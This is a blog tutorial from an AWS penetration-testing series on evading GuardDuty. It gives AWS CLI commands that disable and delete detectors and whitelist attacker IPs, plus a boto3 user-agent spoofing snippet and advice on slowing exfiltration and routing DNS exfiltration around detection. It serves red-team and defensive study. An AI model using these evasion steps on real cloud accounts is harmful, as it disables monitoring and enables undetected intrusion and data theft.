AWS Penetration Testing Part - 7: Bypassing AWS GuardDuty

March 17, 2025
AWS SecurityPentestingGuardDuty

🔍 Pentesting and Bypassing AWS GuardDuty

AWS GuardDuty is a threat detection service that continuously monitors for malicious activity and unauthorized behavior. This post covers advanced red team techniques to understand, test, and bypass GuardDuty, making it an essential read for cloud security researchers and penetration testers.

🧠 Understanding GuardDuty

GuardDuty analyzes VPC flow logs, CloudTrail event logs, and DNS logs. Notably

  • DNS logs are only analyzed if routed through AWS DNS.
  • Logs can be centrally monitored using a master account.
  • Detection is based on baselines built via machine learning.

Common findings include

  • Reconnaissance
  • IAM privilege enumeration
  • Bitcoin mining pools
  • API calls from known hacking distros

For complete finding types, check AWS GuardDuty Finding Types.

⚙️ Creating CloudWatch Event Rules for GuardDuty

To automate reactions to findings:

  1. Go to CloudWatch > Events > Create Rule
  2. Event source: GuardDuty
  3. Event type: GuardDuty Finding
  4. Add target: SNS/Lambda

Example use case

1// Lambda function triggered by suspicious domain contact
2// Automatically updates security group to block outbound traffic

🛡️ Bypassing GuardDuty

❌ Disable Detectors (Destructive)

1aws guardduty list-detectors
2aws guardduty update-detector --detector-id <detector-id> --no-enable
3aws guardduty delete-detector --detector-id <detector-id>

⚠️ Not recommended noisy and easily noticed.

🧊 IP Whitelisting

Upload attacker IP list to S3

1aws s3 cp ./ip-whitelist.txt s3://your-bucket
2aws s3api put-object-acl --bucket your-bucket --key ip-whitelist.txt --acl public-read

Whitelist via

1aws guardduty create-ip-set --detector-id <id> --name Whitelist --location https://s3.amazonaws.com/your-bucket/ip-whitelist.txt --format TXT --activate

Update existing list

1aws guardduty update-ip-set --detector-id <id> --ip-set-id <ip-set-id> --location https://... --activate

Automate using Pacu

1run guardduty_whitelist_ip --path https://s3.amazonaws.com/bucket/ip-whitelist.txt

🕵️ Bypass EC2 Credential Exfiltration Alerts

GuardDuty alert: UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration

✅ Solution

Launch your own EC2 instance and operate from there.

1aws ec2 run-instances --image-id ami-... --instance-type t2.micro --key-name <your-key> --user-data file://userdata.txt

In userdata.txt

1#!/bin/bash
2apt update && apt install python3 python3-pip git -y
3pip3 install awscli
4git clone https://github.com/RhinoSecurityLabs/pacu.git && cd pacu
5bash install.sh

🧬 Bypass OS Detection

GuardDuty flags API calls from

  • Kali
  • Parrot
  • Pentoo

Modify user-agent

1import boto3, botocore
2from botocore.config import Config
3
4config = Config(user_agent='aws-cli/1.15.10 Python/2.7.9 Windows/8 botocore/1.10.10')
5client = boto3.client('ec2', config=config)

Pacu handles this automatically for you when creating a session.

💻 Other Techniques

📉 Crypto Alerts

Avoid known mining pool IPs:

Avoid CryptoCurrency:EC2/BitcoinTool.B finding

🌐 Port Behavior

Stick to common ports (80, 443) to bypass

Behavior:EC2/NetworkPortUnusual

📤 Traffic Volume

Slow your exfiltration

Behavior:EC2/TrafficVolumeUnusual

🧮 Resource Launch

Avoid RunInstances API: Use Glue dev endpoints, Lightsail, or AppStream.

🔐 Password Policy

Don't weaken it:

Stealth:IAMUser/PasswordPolicyChange

📡 DNS Data Exfiltration

Avoid DNSbased data exfil if using AWS DNS

Use alternate DNS resolvers to bypass.

✅ Summary

GuardDuty is powerful but limited. Awareness of what triggers alerts and how to bypass them is crucial in red team operations. Still, it is only part of the picture. Assume more advanced detections exist, and act accordingly.

← Previous: CloudTrail

Next: → Security Tools